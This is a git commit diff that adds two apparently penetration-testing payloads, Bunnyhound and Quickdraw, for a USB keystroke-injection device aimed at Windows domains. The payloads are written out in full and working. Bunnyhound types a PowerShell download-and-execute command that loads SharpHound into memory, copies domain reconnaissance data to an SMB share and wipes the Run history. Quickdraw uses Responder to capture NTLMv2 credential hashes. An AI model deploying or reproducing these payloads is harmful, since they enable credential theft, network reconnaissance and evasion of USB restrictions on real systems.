Bunnyhound and Quickdraw added (#343)

* Add files via upload Initial payload * Add files via upload Initial payload
2025-10-29 16:58:25 +00:00 · 2018-05-20 16:23:53 -05:00 · 2018-05-20 16:23:53 -05:00 · 9fab25740d
commit 9fab25740d
parent be78dafbfc
6 changed files with 631 additions and 0 deletions
--- a/payloads/library/credentials/Bunnyhound/SharpHound.ps1
+++ b/payloads/library/credentials/Bunnyhound/SharpHound.ps1
--- a/payloads/library/credentials/Bunnyhound/payload.txt
+++ b/payloads/library/credentials/Bunnyhound/payload.txt
@ -0,0 +1,64 @@
+#!/bin/bash
+#
+# Title:         Bunnyhound
+# Author:        golem445
+# Version:       1.0
+# Dependencies:  Impacket, gohttp
+# Runtime:		 Dependent on domain size
+#
+#
+# Sets up Ethernet and HID keyboard interfaces simultaneously,
+# then uses HID to import Sharphound into memory via local
+# web server and execute the attack. Results are exported
+# to the loot directory via SMB.
+
+# Start Setup
+LED SETUP
+
+# Check dependencies
+REQUIRETOOL impacket gohttp
+GET SWITCH_POSITION
+
+# Temporary loot directory
+mkdir -p /loot/smb/
+
+# Permanent loot directory
+mkdir -p /root/udisk/loot/bunnyhound_exfil/
+
+# Set interfaces 
+ATTACKMODE RNDIS_ETHERNET HID
+
+# Start web server
+cd /root/udisk/payloads/$SWITCH_POSITION
+gohttp -p 80 &
+
+# Start SMB Server
+python /tools/impacket/examples/smbserver.py s /loot/smb &
+
+# Start attack
+LED ATTACK
+RUN WIN powershell
+Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
+Q ENTER
+
+# Wait until files are done copying.
+LED STAGE2
+while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
+
+# Start Cleanup 
+LED CLEANUP
+
+# Delete Exfil file
+rm /loot/smb/EXFILTRATION_COMPLETE
+
+# Move Kerberos SPNS to permanent loot directory
+mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/
+
+# Clean up temporary loot directory
+rm -rf /loot/smb/*
+
+# Sync file system
+sync
+
+# Complete
+LED FINISH
--- a/payloads/library/credentials/Bunnyhound/readme.md
+++ b/payloads/library/credentials/Bunnyhound/readme.md
@ -0,0 +1,32 @@
+# Bunnyhound
+* Author: golem445
+* Version: 1.0
+* Target: Windows Domains
+
+## Description
+
+Sets up Ethernet and HID keyboard interfaces simultaneously,
+then uses HID to import Sharphound into memory via Bash Bunny
+web server and execute the attack. Results are exported to
+the loot directory via SMB. 
+
+Note: This module will bypass network restrictions on USB
+disk drives as only a network card and keyboard are emulated.
+
+## Requirements
+
+Impacket and gohttp should be installed
+
+## STATUS
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| Flashing Red        | Impacket or gohttp not found             |
+| Solid Violet        | Setup for attack                         |
+| Flashing Amber      | Attack in progress                       |
+| Flashing Cyan       | Cleaning up                              |
+| Solid Green         | Attack complete                          |
+
+## Credits
+
+* Hak5Darren for SMB exfil
--- a/payloads/library/credentials/Bunnyhound/s.ps1
+++ b/payloads/library/credentials/Bunnyhound/s.ps1
@ -0,0 +1,5 @@
+IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/Sharphound.ps1');Invoke-Bloodhound -NoSaveCache -CompressData
+move Blood* \\172.16.64.1\s\
+New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+exit
--- a/payloads/library/credentials/Quickdraw/payload.txt
+++ b/payloads/library/credentials/Quickdraw/payload.txt
@ -0,0 +1,58 @@
+#!/bin/bash
+#
+# Title:         Quickdraw
+# Author:        golem445
+# Version:       1.0
+# Dependencies:  Responder
+# Runtime:		 ~8 seconds
+#
+# Sets up Ethernet and HID keyboard interfaces simultaneously,
+# runs Responder, then uses HID to generate an NTLMv2 hash
+# response from the target computer.
+
+# Prereq check
+REQUIRETOOL responder
+
+# Begin attack setup
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+GET TARGET_HOSTNAME
+LOOTDIR=/root/udisk/loot/quickdraw
+
+# Prep loot logging
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+cd /tools/responder/
+rm logs/*
+
+# Begin Responder
+LED ATTACK
+python Responder.py -I usb0 -wfvr &
+
+## Start HID Attack
+sleep 1
+RUN WIN cmd
+Q DELAY 250
+Q STRING "powershell \\\\172.16.64.1\\s"
+Q ENTER
+Q STRING "exit"
+Q ENTER
+
+# Wait for NTLMv2 capture to complete
+LED STAGE2
+until [ -f logs/*NTLM* ]
+do
+     sleep 1
+done
+
+# copy logs to loot directory
+cp logs/* $LOOTDIR/$HOST-$COUNT
+
+# Sync the file system
+sync
+
+## Finished
+LED FINISH
--- a/payloads/library/credentials/Quickdraw/readme.md
+++ b/payloads/library/credentials/Quickdraw/readme.md
@ -0,0 +1,26 @@
+# Quickdraw
+* Author: golem445
+* Version: 1.0
+* Target: Windows Domains
+
+## Description
+
+Sets up Ethernet and HID keyboard interfaces simultaneously,
+runs Responder, then uses HID to generate an NTLMv2 hash
+response from the target computer.
+
+Note: This module will bypass network restrictions on USB
+disk drives as only a network card and keyboard are emulated.
+
+## Requirements
+
+Responder should be installed
+
+## STATUS
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| Flashing Red        | Responder not found                      |
+| Solid Violet        | Setup for attack                         |
+| Flashing Amber      | Attack in progress                       |
+| Solid Green         | Attack complete                          |